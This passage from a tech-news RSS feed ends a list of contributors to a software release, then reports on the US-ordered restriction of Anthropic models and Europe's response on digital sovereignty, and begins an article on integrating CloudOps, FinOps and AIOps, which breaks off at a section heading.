data-hovercard-url="/users/jcjc81/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcjc81">@jcjc81</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jearnest11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jearnest11">@jearnest11</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeeves-assistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeeves-assistant">@jeeves-assistant</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jeffgithub0029/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jeffgithub0029">@Jeffgithub0029</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrobodie-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrobodie-glitch">@jeffrobodie-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JezzaHehn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JezzaHehn">@JezzaHehn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimmyjohansson84/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimmyjohansson84">@jimmyjohansson84</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmmaloney4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmmaloney4">@jmmaloney4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jnibarger01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jnibarger01">@jnibarger01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jplew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jplew">@jplew</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Junass1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Junass1">@Junass1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justemu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justemu">@justemu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justin-cyhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justin-cyhuang">@justin-cyhuang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JustinOhms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JustinOhms">@JustinOhms</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jvradahellys24-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jvradahellys24-art">@jvradahellys24-art</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaishi00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaishi00">@kaishi00</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kangsoo-bit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kangsoo-bit">@kangsoo-bit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kartik-mem0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kartik-mem0">@kartik-mem0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keiravoss94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keiravoss94">@keiravoss94</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kenyonxu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kenyonxu">@kenyonxu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kernel-t1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kernel-t1">@kernel-t1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kewe63/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kewe63">@Kewe63</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeyArgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeyArgo">@KeyArgo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KiruyaMomochi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KiruyaMomochi">@KiruyaMomochi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn8-codes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn8-codes">@kn8-codes</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kolektori/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kolektori">@Kolektori</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kyssta-exe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kyssta-exe">@kyssta-exe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kyzcreig/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kyzcreig">@Kyzcreig</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lazymonter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lazymonter">@Lazymonter</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LehaoLin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LehaoLin">@LehaoLin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD,<br>
@libre-7, @LIC99, @LifeJiggy, @linyubin, @liuhao1024, @lkevincc0, @lkz-de, @loes5050, @londo161, @lubosxyz,<br>
@m24927605, @MaheshtheDev, @manus-use, @marco0158, @MarioYounger, @martinramos002-bot, @MattKotsenas,<br>
@max-chen, @MaxFreedomPollard, @maxmilian, @maxpetrusenko, @memosr, @Mibayy, @Minksgo, @mintybasil, @mkslzk,<br>
@mohamedorigami-jpg, @MorAlekss, @mrparker0980, @ms-alan, @namredips, @nankingjing, @natehale, @necoweb3,<br>
@neo-2026, @Nickperillo, @nightq, @nikshepsvn, @nnnet, @nocturnum91, @nodejun, @NousResearch, @nycomar,<br>
@OmarB97, @orbisai0security, @oreoluwa, @outsourc-e, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @p-andhika, @panghuer023, @Paperclip,<br>
@peetwan, @pefontana, @petrichor-op, @pinguarmy, @PINKIIILQWQ, @pmos69, @PolyphonyRequiem, @pprism13,<br>
@PRATHAMESH75, @professorpalmer, @pyxl-dev, @Que0x, @qWaitCrypto, @r266-tech, @RafaelMiMi, @Railway9784,<br>
@randomuser2026x, @rayjun, @rc-int, @rebel0789, @redactdeveloper, @riyas22, @rlaope, @rob-maron, @rodboev,<br>
@rodrigoeqnit, @rratmansky, @rrevenanttt, @ruangraung, @Ruzzgar, @ryo-solo, @s010mn, @Sahil-SS9,<br>
@SahilRakhaiya05, @SandroHub013, @Sanjays2402, @sasquatch9818, @ScotterMonk, @season179, @sgabel, @sgaofen,<br>
@sgtworkman, @shandian64, @shannonsands, @shashwatgokhe, @shawchanshek, @sherman-yang, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @SidUParis,<br>
@SimoKiihamaki, @simpolism, @sjh9714, @skabartem, @skyc1e, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>, @soynchux, @spiky02plateau, @spjoes,<br>
@sprmn24, @srojk34, @stepanov1975, @steveonjava, @Subway2023, @sweetcornna, @swissly, @Sworntech-dev,<br>
@syahidfrd, @synapsesx, @szzhoujiarui-sketch, @talmax1124, @telos-oc, @testingbuddies24, @texhy, @tgmerritt,<br>
@theAgenticBuilder, @thestral123, @tkwong, @Tortugasaur, @Tranquil-Flow, @trevorgordon981, @truenorth-lj,<br>
@tt-a1i, @tuancookiez-hub, @TutkuEroglu, @tymrtn, @udatny, @UgwujaGeorge, @underthestars-zhy, @uperLu,<br>
@uzunkuyruk, @valenteff, @valentt, @vanthinh6886, @Versun, @victor-kyriazakos, @virtuadex, @vKongv,<br>
@w31rdm4ch1nZ, @weidzhou, @wgu9, @whoislikemiha, @wnuuee1, @woaini30050, @WuKongAI-CMU, @WuTianyi123, @WXBR,<br>
@x7peeps, @x9x9x9x9x9x91, @Xowiek, @xxchan, @xxxigm, @xydigit-zt, @yapsrubricsz0, @yashiels, @yeyitech, @ygd58,<br>
@YLChen-007, @yong2bba, @yoniebans, @ypwcharles, @yu-xin-c, @yungchentang, @yusekiotacode, @YuShu, @yyzquwu,<br>
@zapabob, @zccyman, @zeapsu, @zmlgit, @znding04, @Zyxxx-xxxyZ</p>
<p>Also: Lucas Nicolas.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.6.19...v2026.7.1">v2026.6.19...v2026.7.1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe looks to fight any forced shutdown of AI]]></title>
<description><![CDATA[It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable Anthropic’s latest models. Citing national security concerns, the Trump Administration fo...]]></description>
<link>https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</guid>
<pubDate>Wed, 01 Jul 2026 18:48:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html" target="_blank">Anthropic’s latest models</a>. Citing national security concerns, the Trump Administration forced the company to prevent non-U.S. citizens (even in the US) from using its most advanced models — the very ones it had just unveiled. Speculation suggests the same thing could happen to OpenAI.</p>



<p>The ban on Anthropic was not <a href="https://www.computerworld.com/article/4191565/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models-2.html">lifted until June 30</a>. The US administration said that, in the intervening weeks, it had worked with the company to “review and approve Fable5 to ensure it aligns with the US government and strengthens US leadership in AI.” For its part, OpenAI confirmed that its next major launch would begin with a preview for “trusted partners ”—a list it has shared with the US government.</p>



<p>Are these companies falling victim to their own marketing — having touted that their models are becoming increasingly intelligent and potentially more dangerous? Or are they collateral damage in an uncertain geopolitical world? Whatever the rationale, the recent moves raise questions in Europe, where <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html" data-type="link" data-id="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">digital sovereignty movements are on the rise</a>.</p>



<p>The sudden shutdown of Fable 5 and Mythos 5 for European companies had a limited direct impact, because the models were so new. As Fernando Maldonado, senior analyst at Foundry Spain, noted: “Hardly anyone here had even started using them yet.” The indirect impact is more far-reaching, because it shows that a forced technological blackout is possible and that Europe has a limited margin for response.</p>



<p>The doomsday scenarios warn that Europe could be headed for a future tech disaster that will have a domino effect on the economy and society. That’s the conclusion of the <a href="https://europe2031.ai/" target="_blank" rel="noreferrer noopener"><em>“Europe 2031”</em></a> report, prepared by a group of European AI researchers, analysts, and investors. “The current trajectory of AI calls for the most ambitious political agenda in the history of postwar Europe,” the report concludes. They argue that Europe has failed to grasp the scale of AI ‘s spread and warn that Europe couldl fall into irrelevance. (The group estimates that, in that scenario, the continent would control only 5% of AI computing by 2031, compared to 80% for the US). There is <a href="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm" data-type="link" data-id="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm">much talk of sovereignty</a>, but little real-world action so far.</p>



<p>That dystopian vision of the future coexists with other, more nuanced perspectives. But analysts and political scientists point out that AI could yet become an economic and political lever that will shape the future balance of power.</p>



<h2 class="wp-block-heading">The ‘kill switch’ scenario</h2>



<p>The total shutdown “kill switch” option, deemed impossible not so long ago, has established itself as one of the real potential fears in geopolitical risk: it was on the agenda at <a href="https://www.euronews.com/my-europe/2026/06/17/ai-takes-centre-stage-at-g7-as-western-fears-over-us-kill-switch-get-real" target="_blank" rel="noreferrer noopener">the recent G7 meeting</a>. The Anthropic case was seen as a warning. “Technology is increasingly a strategic asset. Europe must be able to act on its own terms,” European Commission spokesperson Thomas Regnier told <em>Euronews</em>. <a href="https://www.reuters.com/legal/litigation/eu-commission-looking-practical-consequences-anthropic-decision-spokesperson-2026-06-14/" target="_blank" rel="noreferrer noopener">Speaking to Reuters</a>, he added, “This event is further proof that Europe must strengthen its technological sovereignty.”</p>



<p>The Anthropic outage “has given ammunition to those who have been calling for investment in technological sovereignty and highlights this geopolitical situation,” said <a href="https://es.linkedin.com/in/beatrizariasg" data-type="link" data-id="https://es.linkedin.com/in/beatrizariasg" target="_blank" rel="noreferrer noopener">Beatriz Arias</a>, director of digital transformation at DigitalES. Arias believes the incident shows that today’s reality requires work in more areas; it is no longer enough to manage telecommunications or standards. Other issues such as interoperability and intellectual property are on the table, as well as “the need to invest more in our own capabilities, without prejudice to our continued commitment to an open model of cooperation and alliances.”</p>



<p>That said, Darío García de Viedma, a researcher in Technology and Digital Policy at the Elcano Royal Institute, does not believe the feared kill switch will be used, “because the US  technology export model depends on companies. Companies are the strong arm of US diplomacy in the technological sphere.” For them to play that tole, they need a global presence. But he does agree that what happened with Anthropic helps “explain this risk to the public” — and incidentally showcase what technological sovereignty is.</p>



<p>Even if a catastrophic blackout doesn’t occur, other problems could still hinder access. Political scientist Amélie Férey explained on <a href="https://www.radiofrance.fr/franceculture/podcasts/l-invite-e-des-matins/guerre-au-moyen-orient-a-qui-profite-cet-accord-7310775" target="_blank" rel="noreferrer noopener"><em>France Culture</em></a> how license prices could gradually rise and drive up costs. Or access to certain features could be gradually restricted. As García de Viedma put it, a moratorium on model access would create a “temporal asymmetry.” Disruptions can occur in “the complex supply chain behind all our technology,” through export controls (something now happening in the chip market) or through the degradation of essential services (such as what could happen with Starlink coverage).</p>



<p>In recent years, the European Union has entered a race in that arena, one that involves symbolic measures well as practical legislative moves. The European Parliament has <a href="https://www.politico.eu/article/european-parliament-ditches-google-for-french-search-engine/" target="_blank" rel="noreferrer noopener">dropped Google as its default search engine</a> and replaced it with the French Qwant. And in early June, the Commission presented its <a href="https://commission.europa.eu/news-and-media/news/strengthening-europes-tech-sovereignty-2026-06-03_en" target="_blank" rel="noreferrer noopener">European Technology Sovereignty Package</a>, which <a href="https://www.computerworld.com/article/4169676/the-european-commission-is-considering-rules-that-would-restrict-u-s-cloud-services.html">addresses, among other issues, AI</a>. They aim to ensure that Europe becomes “a continent of AI, strengthen its digital autonomy, and help build a more sustainable digital future,” while also acknowledging Europe’s technological dependence.</p>



<p>“We cannot afford to depend on others for the technologies that keep our hospitals running, our energy grids stable, and our services secure,” said Commission President Ursula von der Leyen. Specifically, Europe aims to triple the capacity of its data centers over the next five to seven years, boost the adoption of AI, enhance research and innovation, and work on its own development and deployment efforts. The package will now have to go through an approval process to become law and take effect.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/P-069883_00-02_01-ORIGINAL-271239.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Henna Virkkunen y Dan Jørgensen, en la presentación del paquete de soberanía tecnológica de la UE el pasado 3 de junio" class="wp-image-4191473" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Henna Virkkunen and Dan Jørgensen at the presentation of the EU’s technological sovereignty package on June 3.</strong></p>
</figcaption></figure><p class="imageCredit">UE</p></div>



<h2 class="wp-block-heading">Has Europe done enough?</h2>



<p>The big question is whether what Europe has done — and what it plans to do — will be enough. Are the sovereignty packages sufficient, or are they vague and lacking in concrete details? The Europe 2031 group accuses Europe of making empty promises that don’t translate into tangible results.</p>



<p>García de Viedma said the latest package represents “good progress, which is defining technological sovereignty as risk mitigation.” In this case, risk has three aspects: technological dependence could be used as a coercive measure; tech operations could be disrupted “if at any point our alliances deteriorate;” and IT could be used as a tool for surveillance. </p>



<p>“Not to sound like conspiracy theorists, but the fact is that there is a possibility that whoever controls the communication nodes and software has the ability to see, if not everything, then at least some things,” he said. “That gives them an advantage.” Therefore, sovereignty is not so much “that identity-based vision” but rather one of “risk avoidance.” It’s not about using European technology simply because it’s European, but about understanding the risks of not using it.</p>



<p>Viedma believes the Commission has accurately identified today’s problems (such as governance or the digitization of the power grid, “the main bottleneck for AI”) but wonders about the future. Added to this is the issue of money: investment is a key piece in this chess game.</p>



<p>DigitalES views the efforts currently under way — such as those regarding European chips — favorably. “What’s needed is more determination and focus,” said Arias. Incidents like the Anthropic case can “help move in that direction.” While European investment plans in AI may seem less grandiose than those of the sector’s major companies, Arias warned against defeatist rhetoric. <br></p>



<p>“The EU is doing what it needs to do,” he said, and is creating “a more geopolitically stable environment for investors. Ultimately, this is about the market and who creates the most value.” European regulations can eventually become global standards, with Europe positioning itself “as an attractive partner for investment” — one that is “reliable and more predictable.”</p>



<p>Arias said the key lies not in complete autonomy, but in finding a balance. “We don’t have to produce 100% of what we use, and we shouldn’t depend 100% on a single supplier or jurisdiction.” What’s needed is technological diplomacy, being able to navigate complex waters and safeguard interests.</p>



<p>Playing by different rules in the global AI market is not feasible. “You must be aware of your strengths and weaknesses.” And she insists: “Europe is by no means a long shot — quite the opposite, because it offers certain guarantees.”</p>



<h2 class="wp-block-heading">The next great revolution</h2>



<p>Europe is late to the AI race, but it can still “assume a certain leadership role,” depending on how the sector evolves, as García de Viedma notes. Europe can carve out its own niche and investments are being made and efforts are under way to do so. In AI, this involves identifying areas of European specialization.</p>



<p>There remains a lot of work to be done and, possibly, lessons learned from past experiences to face what lies ahead. AI issues are part of a very complex reality. Arias warned of the need to prepare for “the convergence of artificial intelligence with the computing power that quantum computing will provide” featuring “dual-use technology that will be employed for both military and civilian purposes.” These will be more powerful tools that “require a more solid foundation.</p>



<p>“Such technological diplomacy will be necessary to negotiate global quantum standards, protect intellectual property, and address the potential impact on national security.”</p>



<p>The quantum revolution is imminent, but has yet to unfold, and Europe can capitalize on <a href="https://www.computerworld.es/article/4067287/especial-tecnologia-cuantica-2025.html">it</a>. “Europe is jumping on this bandwagon,” argued Arias, highlighting the investments and work on quantum capabilities. “We’re in a very different situation than we were with the cloud and artificial intelligence.” The EU is “acting quickly” and opening the door to “positioning ourselves country by country.” </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A framework for operational autonomy: Integrating CloudOps, FinOps and AIOps]]></title>
<description><![CDATA[Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can ...]]></description>
<link>https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</guid>
<pubDate>Wed, 01 Jul 2026 11:06:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can no longer rely only on manual oversight, disconnected monitoring tools or periodic financial reviews to keep enterprise technology healthy and cost efficient. What is needed instead is a coordinated operating framework that brings together CloudOps, FinOps and AIOps, while also addressing the emerging discipline of AI token and model consumption governance. When these disciplines are designed as one connected system rather than as isolated workstreams, organizations move closer to operational excellence: faster decisions, better resilience, improved financial control, stronger compliance and a more measurable connection between technology investments and business outcomes.</p>



<h2 class="wp-block-heading">What operational autonomy means in enterprise IT</h2>



<p>Operational autonomy does not mean removing people from operations. In practice, it means designing enterprise IT so that routine sensing, decision support, remediation, optimization and policy enforcement happen with minimal friction and with the right human oversight at the right moments. A mature autonomous operating model continuously observes infrastructure, applications, data flows, AI services and financial consumption patterns; detects risk or inefficiency early; and triggers guided or automated action based on policy, confidence and business criticality. This approach depends on four connected pillars: CloudOps to maintain reliable and scalable digital infrastructure, FinOps to govern cost and value, AIOps to detect patterns and automate response, and AI consumption governance to manage token usage, model selection, inference workloads and unit economics.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics emphasizes that cloud operations and financial governance are no longer separate concerns, especially as AI workloads reshape cost structures and accountability expectations. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">analysis</a> of AIOps and observability similarly notes that modern enterprises need deeper operational visibility and broader insight-driven coordination to handle hybrid complexity. IDC’s 2024 <a href="https://www.marketresearch.com/IDC-v2477/Future-Operations-Framework-38402860/" rel="nofollow">perspective</a> on future operations adds another useful lens by framing data-driven operations around agility, resilience and predictability. Taken together, these viewpoints reinforce the same idea: autonomy is not a tool purchase; it is a management framework.</p>



<h2 class="wp-block-heading">Design principles for an enterprise operational autonomy framework</h2>



<p>A practical framework begins with a few disciplined principles. First, the enterprise must build around a shared operational data layer. Telemetry from cloud infrastructure, applications, service management systems, security controls, business transactions and AI services should be normalized so that operations, finance and governance teams work from the same facts. Second, every automated action should be policy-aware. Cost optimization, scaling, failover, remediation, model routing, data retention and access control should all reflect business guardrails rather than isolated technical rules.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="688" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: The four pillars of autonomous IT.</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Third, the framework should be value-led rather than purely cost-led. FinOps has matured beyond simply lowering spend; the stronger objective is to align spend with business priorities, performance requirements and acceptable risk. Fourth, autonomy should progress in stages. Enterprises usually start with visibility, then introduce recommendations, then guided automation and finally closed-loop autonomy for low-risk scenarios. Fifth, executive accountability must be explicit. Operational autonomy touches architecture, finance, privacy, security, data stewardship and business strategy. Without a cross-functional ownership model, autonomy becomes fragmented and difficult to govern. Everest Group’s 2024 FinOps Cloud Cost Management <a href="https://www.everestgrp.com/report/egr-2024-29-r-6601/" rel="nofollow">assessment</a> highlights the growing demand for role-based access, cost intelligence, governance and automation as core requirements for enterprise cloud cost management products. That is a useful signal that the framework must be built for collaboration, not just analytics.</p>



<h2 class="wp-block-heading">Integrating CloudOps, FinOps and AIOps into one operating model</h2>



<p>CloudOps, FinOps and AIOps are often discussed separately because each emerged from a different operational problem. CloudOps grew out of the need to run cloud estates reliably and at scale. FinOps developed in response to unpredictable consumption-based billing. AIOps emerged because traditional monitoring could not keep pace with the volume and complexity of telemetry generated across modern digital systems. Yet in a mature enterprise, these disciplines converge naturally.</p>



<p>A performance incident in a cloud platform is rarely only an availability problem; it may also drive higher infrastructure consumption, trigger excess logging charges, degrade customer experience or increase token usage in AI-enabled workflows. Similarly, a cost spike may not be a finance issue alone; it may reveal inefficient architecture, poor scheduling, unnecessary data movement or an AI agent behaving outside policy.</p>



<p>An integrated operating model therefore links observability signals, service context, business KPIs, financial metrics and automation rules into one decision fabric. CloudOps provides the runtime discipline, FinOps introduces value and accountability, and AIOps adds pattern recognition and intelligent response. When connected well, the enterprise can answer not only what is happening, but why it is happening, what it is costing, what risk it creates and what the best next action should be.</p>



<h2 class="wp-block-heading">AI token optimization and AI cost spend governance</h2>



<p>AI introduces a new cost curve into enterprise operations. Unlike traditional software costs, token spend can vary sharply based on prompt design, model choice, context length, retrieval patterns, orchestration logic, concurrency, caching strategy and user behavior. This makes AI cost governance an essential part of operational autonomy. A strong framework begins by defining the unit economics of AI consumption: cost per request, cost per conversation, cost per business workflow, cost per user segment and cost per outcome.</p>



<p>Once these baselines are visible, the enterprise can introduce optimization controls such as prompt compression, response-length policies, semantic caching, model tiering, workload routing to lower-cost models where quality tolerance allows, context-window discipline, batch processing for non-real-time use cases and approval thresholds for premium model usage. AI gateways and model brokers can enforce these policies consistently across teams.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="709" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure 2: AI FinOps framework</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Chargeback or showback mechanisms should also extend to AI services so that business units see both value and consumption behavior. Recent <a href="https://www.forbes.com/councils/forbesfinancecouncil/2026/05/27/a-cfos-five-layer-framework-to-govern-ai-token-spend-before-it-governs-you/" rel="nofollow">analysis</a> in Forbes has drawn attention to the financial risks of unmanaged token growth and argues for governance layers that connect finance and engineering before AI expenditure becomes opaque. FinOps Foundation guidance on FinOps for AI reinforces the same message, noting that token-level metrics, quotas, tagging, GPU allocation practices and real-time monitoring are necessary to keep AI costs aligned to business value. In enterprise settings, the lesson is straightforward: if cloud cost needed FinOps, AI cost needs an even tighter form of FinOps because usage can scale much faster and become far less transparent as mentioned in IDC <a href="https://my.idc.com/getdoc.jsp?containerId=US53688325" rel="nofollow">report</a>.</p>



<h2 class="wp-block-heading">FinOps for cloud infrastructure cost management</h2>



<p>Cloud infrastructure cost management remains one of the foundational layers of operational autonomy because every autonomous workflow eventually rests on compute, storage, networking, platform services and data transfer. An effective FinOps capability does more than flag overspend after the month has ended. It creates near-real-time visibility into consumption, ownership, unit economics, forecast variance, commitments and waste patterns.</p>



<p>The enterprise should define standard practices for tagging, cost allocation, commitment management, rightsizing, idle resource detection, storage tiering, Kubernetes cost visibility, environment lifecycle controls and architecture reviews for high-cost services. More importantly, these practices should be tied to business context. For example, a workload serving a mission-critical customer channel may justify higher spend if it supports revenue protection, whereas a non-production environment should have stricter shutdown and spend caps.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics underscores that AI and data workloads are changing the financial profile of cloud operations and increasing the need for more sophisticated tooling and governance. IDC’s market <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">perspective</a> on intelligent cloud and edge operations with FinOps software also points to the rapid growth of platforms that combine operations intelligence with financial control, suggesting that enterprises increasingly view operational management and cost management as linked disciplines rather than separate layers.</p>



<h2 class="wp-block-heading">Autonomous operations through AIOps</h2>



